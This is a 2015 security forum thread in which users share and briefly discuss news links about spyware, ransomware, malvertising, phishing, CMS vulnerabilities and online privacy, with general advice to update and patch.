Finfisher the spy software of choice for governments to monitor their citizens.
32 governments now known to use this spy software from Germany.
Read this report by Bill Marczak, John Scott-Railton, Adam Senft, Irene Poetranto, and Sarah McKune: https://citizenlab.org/2015/10/mapping-finfishers-continuing-proliferation/
After all of the Hack Team hack commotion, governments haven't really shown to act with more caution in this field. :(
polonus
-
Finfisher the spy software of choice for governments to monitor their citizens.
32 governments now known to use this spy software from Germany.
Read this report by Bill Marczak, John Scott-Railton, Adam Senft, Irene Poetranto, and Sarah McKune: https://citizenlab.org/2015/10/mapping-finfishers-continuing-proliferation/ (https://citizenlab.org/2015/10/mapping-finfishers-continuing-proliferation/)
After all of the Hack Team hack commotion, governments haven't really shown to act with more caution in this field. :(
polonus
What do you expect when the head of the CIA uses a private email hosted at AOL ???
-
Hi bob3160,
In the example you mention. Isn't it always the lucky that draw the winning card and gets such a job, but there is no guarantee he should also be among the brightest. ;D
On the detection of Finfisher read here: http://www.netmagellan.com/how-i-removed-a-finfisher-finspy-malware-infection-1814.html where a tool by the name of Detekt was used, and another interesting article: https://citizenlab.org/2013/04/for-their-eyes-only-2/
However it seems there is a lot of cloak -and-dagger stories and desinformation spin involved where such spyware is concerned. ;)
Seems social engineering is the main route of infection - this spyware has nothing to do with your usage of firefox. it probably comes with a similar filename/logo/description to trick users into allowing it access through firewalls etc (via e-mail).
So for us all here two golden rules:
1.Always update what you have to update (use Avast Update Tool)), patch what you have to patch.
2.Never fall for social engineering.
This is two things that everyone could/should do to feel better protected.
Damian
-
Is this a right step into the right direction? Large browsers now all to support free SSL-service Let's Encrypt.
Re: https://letsencrypt.org/certificates/
Has any of the parties involved also considered this could be a golden opportunity for cybercriminals, when the client-side software comes backdoored? But again cybercrime could afford fraudulous certs already anyway.
On the other hand you do not want the (backdoored) encryption privilage to be exclusively to be with Governments and Big Corps, do you now?
How much of your freedom will you hand over for more privacy as there always will be some sort of tradeoff somewhere?
polonus
-
New security feature coming to firefox in the soon future: http://thenextweb.com/apps/2015/10/21/firefox-is-testing-marking-any-page-that-sends-passwords-over-http-as-insecure/
I have these warnings already a long time from an extension I work in Google Chrome SaferChrome Security report,
alongside runs Browser JSGuard extension (e.g. supported by the Govnmnt of India), warning me about all sort of redirections, as there are: Hidden iFrame(s) Redirections, UnAuthorized Redirections, Encode javascript, External Domain Requests & Trackers.
polonus
-
This is Google Chrome Security's Viewpoint on the matter: https://www.chromium.org/Home/chromium-security/marking-http-as-non-secure
We have three levels here: Secure, Dubious, Insecure.
Read on here: https://sslmate.com/blog/post/chrome_cached_sha1_chains
polonus
-
Fraud Tactics Against Chip-and-PIN Technology
https://blog.malwarebytes.org/fraud-scam/2015/10/fraud-tactics-against-chip-and-pin-technology/?utm_source=Gplus&utm_medium=social
TWO CRITICAL CHALLENGES FACING WEBSITE SECURITY
http://perezbox.com/2015/09/two-critical-challenges-facing-website-security/?utm_campaign=Tony%20Perez%20on%3A%20TWO%20CRITICAL%20CHALLENGES%20FACING%20WEBSITE%20SECURITY&utm_medium=social&utm_source=googleplus
-
Oracle Critical Patch Update Advisory - October 2015
http://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html
-
CAS Team Finds Flaw in Computers’ Timekeeping
http://www.bu.edu/today/2015/hacking-network-time-protocol/
Attacking the Network Time Protocol
http://www.cs.bu.edu/~goldbe/NTPattack.html
pdf.doc http://www.cs.bu.edu/~goldbe/papers/NTPattack.pdf
Patch http://nwtime.org/ntf-releases-ntp-security-patches-ntp-4-2-8p4/
-
Trend Micro Acquires HP TippingPoint, Establishing Game-Changing Network Defense Solution
http://newsroom.trendmicro.com/press-release/company-milestones/trend-micro-acquires-hp-tippingpoint?_ga=1.252947529.1387744404.1445433077
-
Kampagnen Malvertising Campaign Goes After German Users
https://blog.malwarebytes.org/malvertising-2/2015/10/kampagnen-malvertising-campaign-goes-after-german-users/?utm_source=Gplus&utm_medium=social
10 Ways to Protect Against Hackers
https://www.malwarebytes.org/articles/10-ways-to-protect-against-hackers/?utm_source=Gplus&utm_medium=social
Steer Clear of this Apple Invoice Phish
https://blog.malwarebytes.org/fraud-scam/2015/10/steer-clear-of-this-apple-invoice-phish/?utm_source=Gplus&utm_medium=social
-
Ransomware using Remote Desktop to spread itself
http://www.scmagazineuk.com/ransomware-using-remote-desktop-to-spread-itself/article/448377/
http://www.bleepingcomputer.com/news/security/help-recover-files-txt-ransomware-installed-by-targeted-terminal-services-attacks/
-
Watch Out for Health Insurance Spam
https://www.bluecoat.com/security-blog/2015-10-22/watch-out-health-insurance-spam
-
IBM Runs World’s Worst Spam-Hosting ISP?
http://krebsonsecurity.com/2015/10/ibm-runs-worlds-worst-spam-hosting-isp/
-
The cat is out of the bag: http://www.theregister.co.uk/2015/10/24/nsa_encryption_hack/
Actual situation is as feared and predicted in 2005.
Is this a solution? Stop using 1024-bit keys, and use longer prime numbers, and
Use the latest revisions of protocols (which require longer prime numbers)
I do not think so, when encryption gets more and more secure governments want to have a look where the data resides unecrypted, and that is inside your computer!
These are big, big cats and an enormous amount of mice to chase. :D
polonus
-
OK that is now verging on paranoia who has personal information so secret (legal) that it must be kept hidden
-
TalkTalk cyber-attack: Website hit by 'significant' breach
http://www.bbc.com/news/uk-34611857
http://www.bbc.com/news/uk-34615226
http://help2.talktalk.co.uk/oct22incident
-
Furor Over IoT Dangers Could Fuel Innovative Security Measures
https://blog.malwarebytes.org/online-security/2015/10/furor-over-iot-dangers-could-fuel-innovative-security-measures/?utm_source=Gplus&utm_medium=social
Bizarre Essex Police #cyberaware Tweet Mystery
https://blog.malwarebytes.org/online-security/2015/10/bizarre-essex-police-cyberaware-tweet-mystery/?utm_source=Gplus&utm_medium=social
edit: additional: I wonder why they call GCHQ "The Doughnut"? ;D
-
Add-ons may spy on you: https://www.reddit.com/r/firefox/comments/3pwcey/firefox_extension_download_manager_s3_asks_for/
Add-on now removed, but not yet added to this blocklist.
See the blocklist: https://addons.mozilla.org/en-US/firefox/blocked/
Certain add-ons can enhance your browser security. Excessive and unwanted add-ons can cripple security seriously!
polonus
-
Am I Being Phished?
https://blog.malwarebytes.org/fraud-scam/2015/10/am-i-being-phished/?utm_source=Gplus&utm_medium=social
-
You'll find many examples of these types of emails on this forum: :)
https://forum.avast.com/index.php?topic=81030.msg662592#msg662592 (https://forum.avast.com/index.php?topic=81030.msg662592#msg662592)
-
This isn’t the Java I ordered!
https://blog.malwarebytes.org/online-security/2015/10/this-isnt-the-java-i-ordered/?utm_source=Gplus&utm_medium=social
-
Is Mac malware on the rise?
https://blog.malwarebytes.org/mac/2015/10/is-mac-malware-on-the-rise/?utm_source=Gplus&utm_medium=social
-
Is Mac malware on the rise?
https://blog.malwarebytes.org/mac/2015/10/is-mac-malware-on-the-rise/?utm_source=Gplus&utm_medium=social
Yes, it is definitely.
Apple has to ramp up security for sure, better soon than sorry.
-
TalkTalk cyber-attack: Website hit by 'significant' breach
http://www.bbc.com/news/uk-34611857
http://www.bbc.com/news/uk-34615226
http://help2.talktalk.co.uk/oct22incident
TalkTalk Hackers Demanded £80K in Bitcoin
http://krebsonsecurity.com/2015/10/talktalk-hackers-demanded-80k-in-bitcoin/
-
This will be abused grand scale to deliver more spam to your mailboxes: Critical Joomla hole attacked 4 hrs after it being patched: https://www.joomla.org/announcements/release-news/5634-joomla-3-4-5-released.html
Sucuri warns that loads of websites with Joomla CMS have been attacked shortly after the new Joomla release.
As no other, polonus knows how critical CMS security weighs in the balance. One thing to do: update and patch and do not spread extensive info on software to the world and attackers.
polonus (volunteer website security analyst and error-hunter)
-
That is the single most important thing a website/server owner could do is to keep their software up-to-date.
Out of date software has proven to be easily compromised. Funny what one can find out using "wappalyzer"
and doing a little research is also valuable. That is also something one can find out by using http://toolbar.netcraft.com/site_report/
Get the information then run with it. Never know where it will lead.
-
What’s Patch Tuesday?
https://blog.malwarebytes.org/online-security/2015/10/whats-patch-tuesday/?utm_source=Gplus&utm_medium=social
The Art of Data Wiping on Mobile Devices
https://blog.malwarebytes.org/mobile-2/2015/10/the-art-of-data-wiping-on-mobile-devices/?utm_source=Gplus&utm_medium=social
-
What’s Patch Tuesday?
https://blog.malwarebytes.org/online-security/2015/10/whats-patch-tuesday/?utm_source=Gplus&utm_medium=social (https://blog.malwarebytes.org/online-security/2015/10/whats-patch-tuesday/?utm_source=Gplus&utm_medium=social)
Windows 10 no longer has a Patch Tuesday since updates and patches can happen at any time. :)
-
University of Amsterdam's "Amsterdam privacy week" sponsored by Facebook and Google as diamond and platinum sponsors. This is a joke, sponsoring of an event by the ones that caused these problems that are being discussed in the first place, aka the "Silicon Empire". As long as academic independency is guaranteed; sponsors have no influence on the program was the comment of the organizers.
polonus
-
Adobe Security Bulletin - Security update available for Adobe Shockwave Player
https://helpx.adobe.com/security/products/shockwave/apsb15-26.html
-
Through my continuous website scanning it is clearly shown that an awful large amount of websites with all sort of jQuery libaries installed, have as a rule 2 to 5 vulnerable jQuery libraries installed. Some of these with active malware. An enormous amount of websites with WordPress CMS are open to threats because User Enumeration is possible (user and log-in proliferation) or Directory Indexing Enabled. This is an information leakage vulnerability that can reveal sensitive information regarding your site configuration or content. Furthermore plug-ins and themes may be vulnerable to attacks. Alas all such websites are wide open to attack.
Pro-active hosting with security in mind has not been around much on the Interwebs lately. I try to warn wherever I can when a website's security is endangered and may become under threat (compromise, defacement, XSS attacks, script injection etc. etc.). Website owners, -admins, hosters take these warnings at heart and go and protect your future visitors! Scan, update, patch and configure properly.
polonus (volunteer website security analyst and website error-hunter)
-
This will be abused grand scale to deliver more spam to your mailboxes: Critical Joomla hole attacked 4 hrs after it being patched: https://www.joomla.org/announcements/release-news/5634-joomla-3-4-5-released.html
Sucuri warns that loads of websites with Joomla CMS have been attacked shortly after the new Joomla release.
As no other, polonus knows how critical CMS security weighs in the balance. One thing to do: update and patch and do not spread extensive info on software to the world and attackers.
Joomla SQL Injection Attacks in the Wild
https://blog.sucuri.net/2015/10/joomla-sql-injection-attacks-in-the-wild.html
-
A Vintage Year for Free Wine Spam
https://blog.malwarebytes.org/fraud-scam/2015/10/a-vintage-year-for-free-wine-spam/?utm_source=Gplus&utm_medium=social
Leaving Laptops in Hotel Rooms: A Bad Idea
https://blog.malwarebytes.org/privacy-2/2015/10/leaving-laptops-in-hotel-rooms-a-bad-idea/?utm_source=Gplus&utm_medium=social
-
Be aware while Copy-Pasting URLs from Google Search can leak Previous Searches.
So do not do this!
Read from jeremy Rubin this article here: https://medium.com/@jeremyrubin/caution-copy-pasting-urls-from-google-search-can-leak-previous-searches-11940508e79#.fy4492fqk
polonus
-
A true horror-story by Troy Hunt: http://www.troyhunt.com/2015/10/breaches-traders-plain-text-passwords.html
Hacked hoster improves encryption, but what happened before.... :o
polonus
-
Advertising Brokers: A Background Information
https://blog.malwarebytes.org/privacy-2/2015/10/advertising-brokers-background-information/?utm_source=Gplus&utm_medium=social
Imitation Putlocker Site Unlocks Path to PUP
https://blog.malwarebytes.org/online-security/2015/10/imitation-putlocker-site-unlocks-path-to-pup/?utm_source=Gplus&utm_medium=social
-
Picking Apart a Decade of Breaches: The Top 5 Breached Industries
https://blog.trendmicro.com/picking-apart-a-decade-of-breaches-the-top-5-breached-industries/
-
Cybercriminals will exploit your CMS vulnerabilities: https://forum.avast.com/index.php?topic=163838.msg1263387#msg1263387
Don't press your luck, folks: https://securityintelligence.com/cms-hacking-2014-by-the-numbers/
article author =Douglas Bonderud. Upgrade, update and patch or retire that exploitable and vulnerable code!
polonus
-
Recent Flash Zero-Day Now Part of Exploit Kits
https://blog.malwarebytes.org/exploits-2/2015/10/recent-flash-zero-day-now-part-of-exploit-kits/?utm_source=gplus&utm_medium=social
-
Antivirus That Mimics the Brain Could Catch More Malware
http://www.technologyreview.com/news/542971/antivirus-that-mimics-the-brain-could-catch-more-malware/
http://www.engadget.com/2015/11/01/you-might-not-have-to-update-next-gen-antivirus-software/
-
Antivirus That Mimics the Brain Could Catch More Malware
http://www.technologyreview.com/news/542971/antivirus-that-mimics-the-brain-could-catch-more-malware/ (http://www.technologyreview.com/news/542971/antivirus-that-mimics-the-brain-could-catch-more-malware/)
http://www.engadget.com/2015/11/01/you-might-not-have-to-update-next-gen-antivirus-software/ (http://www.engadget.com/2015/11/01/you-might-not-have-to-update-next-gen-antivirus-software/)
Good or bad pretty much depends on who's brain is used. :)
-
Antivirus That Mimics the Brain Could Catch More Malware
http://www.technologyreview.com/news/542971/antivirus-that-mimics-the-brain-could-catch-more-malware/ (http://www.technologyreview.com/news/542971/antivirus-that-mimics-the-brain-could-catch-more-malware/)
http://www.engadget.com/2015/11/01/you-might-not-have-to-update-next-gen-antivirus-software/ (http://www.engadget.com/2015/11/01/you-might-not-have-to-update-next-gen-antivirus-software/)
Good or bad pretty much depends on who's brain is used. :)
Yes thats true. But i guess sooner or later all AVs will use something like this for detection, maybe at some point PCs will be so powerful that no servers are necessary anymore to calculate, but just to hold the data.
-
Has MacUpdate fallen to the adware plague?
https://blog.malwarebytes.org/mac/2015/11/has-macupdate-fallen-to-the-adware-plague/?utm_source=Gplus&utm_medium=social
-
EMET security attacked and circumvented read: https://www.duosecurity.com/blog/wow64-and-so-can-you
link article authors Darren Kemp and Mikhail Davidov.
“EMET mitigations have been bypassed before. This isn’t new.”
Think of the history of the golem folklore, where on the golems forehead
was written the word "emet" (truth), emet minus one letter becomes the word "met" which means dead ;)
polonus
-
It's also the past tense of meet. :)
-
"What's in a word?", said William Shakespeare.
polonus
-
vBulletin.com Password Reset
http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/4332165-vbulletin-com-password-reset
-
Imitation MSI Tournament Site Offers Up “Anticheat” Download
https://blog.malwarebytes.org/online-security/2015/11/imitation-msi-tournament-site-offers-up-anticheat-download/?utm_source=Gplus&utm_medium=social
Backscatter or Misdirected Bounces
https://blog.malwarebytes.org/online-security/2015/11/backscatter-or-misdirected-bounces/?utm_source=Gplus&utm_medium=social
-
CryptoWall 4.0 released with new Features such as Encrypted File Names
http://www.bleepingcomputer.com/news/security/cryptowall-4-0-released-with-new-features-such-as-encrypted-file-names/
I cant stand this malware junk anymore, something has to happen now or we cant stop it anymore.
-
Unfortunately they cannot be tracked down as all security services/police are crippled by the privacy mob.
-
Unfortunately they cannot be tracked down as all security services/police are crippled by the privacy mob.
Thats the issue here, either privacy or Cryptowall. And even if you track them down, whats on the internet once will stay there forever.
-
MacBooks are so hot right now. And so is Mac OS X malware
http://www.theregister.co.uk/2015/11/05/mac_os_x_malware_explodes/
-
ProtonMail still under attack by DDoS bombardment
http://www.theregister.co.uk/2015/11/05/protonmail_ddos_attack/
-
DirectRev Advert Loads Self Sufficient Flash Exploit, CryptoWall
https://blog.malwarebytes.org/malvertising-2/2015/11/directrev-advert-loads-self-sufficient-flash-exploit-cryptowall/?utm_source=Gplus&utm_medium=social
New Malwarebytes Anti-Exploit Adds Fingerprinting Detection
https://blog.malwarebytes.org/exploits-2/2015/11/new-malwarebytes-anti-exploit-adds-fingerprinting-detection/?utm_source=gplus&utm_medium=social
-
E-commerce ttp implications to further erode online privacy: http://techcrunch.com/2015/11/05/tpp-vs-privacy/
polonus
-
Outdated CMS code, unpatched code, left code should be retired asap.
For a jQuery example see: https://forum.avast.com/index.php?topic=178773.msg1265449#msg1265449
Get rid of that vulnerable code, protect the visitors of your website.
Here things are OK: -http://zarabotok.net.ua (well website has other issues)
Detected libraries:
jquery - 1.10.2 : -http://zarabotok.net.ua/res/jquery.js?24
No vulnerable libraries found
polonus
-
Adware-wrappers and bundled-software can now give you a full new malicious browser like eFast en CrossBrowser.
Read: https://blog.malwarebytes.org/online-security/2015/10/efast-browser-hijacks-file-associations/
& https://blog.malwarebytes.org/online-security/2015/11/crossbrowse-another-chromium-project/
Look out what you download and where you download from! Do not get an infested browser installer, this again is a next step from the browser hijacker, the hijacked malware browser in itself.
polonus
-
Things can always get worse as here, where one-way ransomware can never be restored, ruined OS once and for all. :o
Shoddy Programming of Ransomware, where there is no way to be restored even if you pay, as programmer throws out the key with the program:Read:
http://www.bleepingcomputer.com/news/security/shoddy-programming-causes-new-ransomware-to-destroy-your-data/
link article author = Lawrence Abrams
polonus
-
“Offline” Ransomware Encrypts Your Data without C&C Communication
http://blog.checkpoint.com/2015/11/04/offline-ransomware-encrypts-your-data-without-cc-communication/
-
Nice Instagram, Shame about the Code Generator
https://blog.malwarebytes.org/online-security/2015/11/nice-instagram-shame-about-the-code-generator/?utm_source=Gplus&utm_medium=social
-
Almost impossible to cleanse Android malware
Lookout discovers new trojanized adware; 20K popular apps caught in the crossfire: https://blog.lookout.com/blog/2015/11/04/trojanized-adware/
A factory reset would not remove this malware, unfortunately.
-
Nigerian government serving up fresh phish
http://news.netcraft.com/archives/2015/11/05/nigerian-government-serving-up-fresh-phish.html
-
Beware of a New Apple ID Phishing Campaign
http://news.softpedia.com/news/beware-of-a-new-apple-id-phishing-campaign-495896.shtml
-
Belgium gives Facebook 48 hours to stop tracking non-users or pay €250K per day
https://www.rt.com/news/321373-facebook-belgium-court-tracking/
-
UK Parliament Computer Network Locked by Crypto-Ransomware
http://news.softpedia.com/news/uk-parliament-computer-network-locked-by-crypto-ransomware-495965.shtml
-
UK Parliament Computer Network Locked by Crypto-Ransomware
http://news.softpedia.com/news/uk-parliament-computer-network-locked-by-crypto-ransomware-495965.shtml (http://news.softpedia.com/news/uk-parliament-computer-network-locked-by-crypto-ransomware-495965.shtml)
It's the computer of a member of Parliament.... I'd call this misleading advertising. :)
-
Aye no need to hack as she is an MP just dangle something nice and shiny to click :)
-
Aye no need to hack as she is an MP just dangle something nice and shiny to click :)
Like an Expenses Claim form :)
-
Sounds like you love your politicians as much as we do..... :)
-
Own a Vizio Smart TV? It’s Watching You
http://www.propublica.org/article/own-a-vizio-smart-tv-its-watching-you
-
Own a Vizio Smart TV? It’s Watching You
http://www.propublica.org/article/own-a-vizio-smart-tv-its-watching-you
Almost all Smart devices are watching you and collect data, its ridiculous.......
-
Own a Vizio Smart TV? It’s Watching You
http://www.propublica.org/article/own-a-vizio-smart-tv-its-watching-you (http://www.propublica.org/article/own-a-vizio-smart-tv-its-watching-you)
Almost all Smart devices are watching you and collect data, its ridiculous.......
It may be ridiculous but it's a fact of life that the average person needs to adapt to.
-
Official Premier League Fantasy Website Pushes Malvertising
https://blog.malwarebytes.org/malvertising-2/2015/11/official-premier-league-fantasy-website-site-pushes-malvertising/?utm_source=gplus&utm_medium=social
A Week in Security (Nov 01 – Nov 07)
https://blog.malwarebytes.org/online-security/2015/11/a-week-in-security-nov-01-nov-07/?utm_source=gplus&utm_medium=social
-
Encryption ransomware threatens Linux users
https://news.drweb.com/show/?i=9686&lng=en&c=9
https://vms.drweb.com/virus/?i=7704004&lng=en
https://www.virustotal.com/ru/file/fd042b14ae659e420a15c3b7db25649d3b21d92c586fe8594f88c21ae6770956/analysis/
-
Replica YouTube Automated Mails Lead to Fake Pharma
https://blog.malwarebytes.org/fraud-scam/2015/11/fake-youtube-automated-mails-lead-to-fake-pharma/?utm_source=gplus&utm_medium=social
Three Reasons Why Anti-Virus Alone is No Longer Enough
https://blog.malwarebytes.org/security-threat/2015/11/three-reasons-why-anti-virus-alone-is-no-longer-enough/?utm_source=gplus&utm_medium=social
-
Encryption ransomware threatens Linux users
https://news.drweb.com/show/?i=9686&lng=en&c=9
https://vms.drweb.com/virus/?i=7704004&lng=en
https://www.virustotal.com/ru/file/fd042b14ae659e420a15c3b7db25649d3b21d92c586fe8594f88c21ae6770956/analysis/
Strictly speaking it threatens Linux users hosting a web server and running an outdated and insecure version of the Magento third part application.
http://krebsonsecurity.com/2015/11/ransomware-now-gunning-for-your-web-sites/
-
Comes to show you have to upgrade, update and patch everywhere...
polonus
-
User has absolutely no defense against NSA snooping: https://www.reddit.com/r/IAmA/comments/3sf8xx/im_bill_binney_former_nsa_tech_director_worked/
Even tor and ssl aren't always secure, e.g.: http://www.thoughtcrime.org/software/sslstrip/
FBI allegedly paid university 1 million dollars for an in-between attack on the tor infrastructures: https://blog.torproject.org/blog/did-fbi-pay-university-attack-tor-users
polonus
-
Microsoft Security Bulletin Summary for November 2015
https://technet.microsoft.com/en-us/library/security/ms15-nov.aspx
-
DynamicPricer PUP disables browser updates
https://blog.malwarebytes.org/security-threat/2015/11/dynamicpricer-pup-disables-browser-updates/?utm_source=Gplus&utm_medium=social
-
Windows 3.1 crash puts French airport out of commission
www.digitaltrends.com/computing/windows-3-1-crash-puts-french-airport-out-of-commission/
-
Windows 3.1 crash puts French airport out of commission
www.digitaltrends.com/computing/windows-3-1-crash-puts-french-airport-out-of-commission/ (http://www.digitaltrends.com/computing/windows-3-1-crash-puts-french-airport-out-of-commission/)
You certainly can't blame Windows 3.1 for this.
France and the world have more serious problems right now. :'(
-
WordPress sites have been attacked 3 1/2 times more often recently.
WP websites became attacked 7 times more often via (SEO)-spam and RFI attacks (remote file inclusion)
then their non-CMS-application counterparts.
WordPress has a problem according to the Imperva report, that shows all sorts of plug-ins and extensions are being developed for it for where security does not play any role whatsoever and is a last-resort-issue.
So new vulnerabilities and exploits are being detected over and over again. Moreover WordPress is based on PHP, which often comes not securely implemented by developers. Read the report here: http://www.imperva.com/docs/HII_Web_Application_Attack_Report_Ed6.pdf
More often then not these sites are being flagged and alerted for insecure websites but only after the fact, as such websites already have become compromised, attacked, defaced, malware ridden, spam-brewing and spewing, PHISHING and part of all sorts of mal-abuse under the sun. Part of such insecure websites are being taken down, in case of continuing abuse sites' accounts are suspended and/or ad-parked or terminated.
But I and some other here in the forums would like these sites set out as dangerous and open to all forms of abuse from one moment unto the other. Just like a truck should be taken off the road by a highway patrol when it has unsafe technology (slick tyres etc.) these websites with such obvious insecurity because of incompetence and negligenge, should not be allowed any longer to be part of the Interwebs. Users of the Internet would be rather thankful.
polonus (volunteer website security analyst and website error hunter)
-
If it was me,
check used WP version, server software version and such.
And if a version is used a month after a patch/update has been released, block the site/IP and do not allow it until the patch/update is applied.
-
If it was me,
check used WP version, server software version and such.
And if a version is used a month after a patch/update has been released, block the site/IP and do not allow it until the patch/update is applied.
Good job it isn't you, a month is a mere blink of an eye for many. Some wait longer than that just to see if there is any adverse impact of an update/patch.
###
Cast you mind back to the forums software - avast too waited a long time before updating ;D
-
I did not mean that, DavidR. I meant to say there is no excuse for someone to put a WordPress site up, that leaves user enumeration enabled and his log-in info can be retrieved like plain txt as"for instance "user user" or "user admin"or whatever. Such nitwits/fools should better be taken off of the Interwebs because they come endangering themselves and everybody else. When a hoster does not informt them, the hoster is also responsible for every infection this might bring about. Still I see truckloads of websites which are such epic fails. Why we only detect them after the fact and when they have caused incidents and why aren't they set out before the fact for being lively dangerous? But it is just like with certain parents, some should never have children, still they have them. ;D
polonus
For those that are now curious about a website's WP, read here: http://andrewrezk.com/how-to-spy-on-wordpress-sites-detect-their-wp-themes-plugins/ (link author = andrew rezk) Do a scan here: http://scanwp.net/
Damian
-
@ polonus
My post was directly to Eddy, whose post I quoted.
-
Beware scams in the wake of the App Store slip-up
https://blog.malwarebytes.org/mac/2015/11/beware-scams-in-the-wake-of-the-app-store-slip-up/?utm_source=Gplus&utm_medium=social
-
Google Chrome now also warning on fake websites: https://googleonlinesecurity.blogspot.jp/2015/11/safe-browsing-protection-from-even-more.html
These Google safe-browsing guys are giving me a good feeling. Next step warning for/against the technical epic fail websites?
I would welcome that ;)
polonus
-
Very scary ...
Beware of ads that use inaudible sound to link your phone, TV, tablet, and PC
http://arstechnica.com/tech-policy/2015/11/beware-of-ads-that-use-inaudible-sound-to-link-your-phone-tv-tablet-and-pc/
Greetz, Red.
-
Hi eric,
The Interwebs are turning into an ever more scary place. Png-file buffer overflow zero-day waiting for abuse to start:
http://www.openwall.com/lists/oss-security/2015/11/12/2
Hope we can upload png-files until this is being patched. Patch here: libpng.sourceforge.net.
Vulnerable are all webbrowsers, Android, imageviewers, media-players and almost all Office=programmes.
-
Very scary ...
Beware of ads that use inaudible sound to link your phone, TV, tablet, and PC
http://arstechnica.com/tech-policy/2015/11/beware-of-ads-that-use-inaudible-sound-to-link-your-phone-tv-tablet-and-pc/
Greetz, Red.
Ha, Smart TV, dumb user, I think not. From a little over 5 years ago I bought a Samsung LED TV and that was meant to be a Smart TV, there is absolutely no way I would ever hook up its network connection to give it internet access. I never trusted this so called smart title just because it connects to the internet, all this with no smart TV antivirus.
I don't have a microphone connected unless I'm specifically going to use it. The same is true of my netbook and its camera (blanked off).
-
Individual targets will get pinpointed thanks to web analytics:
https://www2.fireeye.com/threat-intel-report-WITCHCOVEN.html
Some 100 websites have been purposefully being hacked and manipulated to redirect the visitors whithout them noticing to another website where WITCHCOVEN script is running to gather information and hand out a super cookie identification.
The attack then later makes use of pinpointed attacks against the target computer.
Wonder whether this is real info or just a American entertainment horror-story report coming from behind a paywall subscription. Has this info been verified :-[ Seems now Russian based....
Read from another source: https://www2.fireeye.com/threat-intel-report-WITCHCOVEN.html
polonus
-
Conficer worm, still out there
Hidden Virus Discovered in Martel Police Body Camera
http://www.goipower.com/?pageId=40
Analysis date: 2015-11-12 11:06:25 UTC ( 5 days, 7 hours ago )
https://www.virustotal.com/en/file/dfc1f69b3efc968310ed8901eda055ea40fa488059a6a3763c356539820ccc3e/analysis/
-
Conficer worm, still out there
(snip)
And if you aren't using any AV or a totally outdated VPS update, it's possible that it may get you. :)
For most people this isn't really something to worry about. :)
-
hmmm ... you mean like McAfee
-
The Casino Malvertising Campaign
https://blog.malwarebytes.org/malvertising-2/2015/11/the-casino-malvertising-campaign/?utm_source=Gplus&utm_medium=social
Blast from the Past: Blackhole Exploit Kit Resurfaces in Live Attacks
https://blog.malwarebytes.org/exploits-2/2015/11/blast-from-the-past-blackhole-exploit-kit-resurfaces-in-live-attacks/?utm_source=Gplus&utm_medium=social
Another Day, Another HMRC Tax Phish…
https://blog.malwarebytes.org/fraud-scam/2015/11/another-day-another-hmrc-tax-phish/?utm_source=gplus&utm_medium=social
-
Just some remarks on the detection of outdated server distributions. A lot of distributions leave the version number as it was *, but administration may do update and patch security holes (we just do not know :o). Such practices are basically wrong however, because excessive server header info proliferation should never and under no circumstances be enabled in the settings by default and actually never be given! An attacker may have other ways to get the info he is after however, but that is outside the scope of what we warn for here.
Your server should not forward any info globally and to attackers, whatever the real security situation of that server may indicate. A list of failures for a SQL Server: https://www.simple-talk.com/sql/database-administration/how-to-get-sql-server-security-horribly-wrong/
So the assumptions of this report are questionable, but that is because of practical implications and the unreliability of passive scan results for certain criteria(see my earlier remarks *): -https://www.sidn.nl/downloads/reports/Passive+Scan+Research.pdf (do not open search results of that report - when you aren't into website security, that report isn't for you!).
polonus
-
"Doctor Web": found Linux.Encoder.2
https://news.drweb.com/show/?i=9709&lng=en&c=5
https://vms.drweb.com/virus/?i=7734389&lng=en
-
Adobe Security Bulletin - Hotfix available for ColdFusion
https://helpx.adobe.com/security/products/coldfusion/apsb15-29.html
-
London (and Dublin) calling – on a mission in the UK and Ireland
https://blog.malwarebytes.org/news/2015/11/london-and-dublin-calling-on-a-mission-in-the-uk-and-ireland/?utm_source=Gplus&utm_medium=social
10 tips to avoid Cyber Monday scams
https://www.malwarebytes.org/articles/cyber-monday/?utm_source=Gplus&utm_medium=social
No money, but Pony! From a mail to a trojan horse
https://blog.malwarebytes.org/intelligence/2015/11/no-money-but-pony-from-a-mail-to-a-trojan-horse/?utm_source=gplus&utm_medium=social
-
Malware Turns to DNS and Steganography to Hide C&C Communications
http://news.softpedia.com/news/malware-turns-to-dns-and-steganography-to-hide-c-c-communications-496437.shtml
-
Yahoo mail to test anti-adblocking! http://www.theverge.com/2015/11/20/9769354/yahoo-mail-ad-blocking
So ad-launching outweighs security. You have to disable your adblocker to get to your mail.
What if the mail has malicious ads? "Commerce über alles, über alles in der Welt!".
polonus
-
Yahoo mail to test anti-adblocking! http://www.theverge.com/2015/11/20/9769354/yahoo-mail-ad-blocking
polonus
There are a lot of other webpages using this method: if you have an anti-ad, it won't be displayed...
-
Yahoo mail to test anti-adblocking! http://www.theverge.com/2015/11/20/9769354/yahoo-mail-ad-blocking
polonus
There are a lot of other webpages using this method: if you have an anti-ad, it won't be displayed...
If they want to push that, I push them and find another source.
I can allow an add in adblock+ but at the same time if the source is on a 3rd party site I can block that with RequestPolicy. That usually makes some think the ads are being delivered.
-
New Dyre variant can target Windows 10 and Microsoft Edge users
http://www.net-security.org/malware_news.php?id=3156
-
After doing a scan the report comes up with either nothing under "threats"but there is a huge list of files under"warning"stating they are inaccessible does this mean they cannot be scanned. If sowhat should be done with them?
-
After doing a scan the report comes up with either nothing under "threats"but there is a huge list of files under"warning"stating they are inaccessible does this mean they cannot be scanned. If sowhat should be done with them?
This should answer your question:
https://blog.avast.com/2014/02/28/how-do-i-handle-files-that-avast-cant-scan/ (https://blog.avast.com/2014/02/28/how-do-i-handle-files-that-avast-cant-scan/)
-
Fake Apps for Windows Phone Trying to Steal Passwords
http://news.softpedia.com/news/fake-apps-for-windows-phone-trying-to-steal-passwords-496523.shtml
-
Dell Laptop self-signed root certificate phishiness?
Read: https://twitter.com/rotorcowboy/status/668485780038287360
Read: http://joenord.blogspot.com/2015/11/new-dell-computer-comes-with-edellroot.html
Dell will comment on this later to-day. Lenovo seems no longer alone ;D
polonus
-
Malvertising pays, while Google and Yahoo are looking away
Another reason to never visit the Interwebs without a decent adblocker.
Read from article author , Alexander J Martin: http://www.theregister.co.uk/2015/11/23/liability_chain_malvertising_advertising/
polonus
-
Vonteera Adware BHO uses certificates to disable Anti-Malware: https://blog.malwarebytes.org/security-threat/2015/11/vonteera-adware-uses-certificates-to-disable-anti-malware/
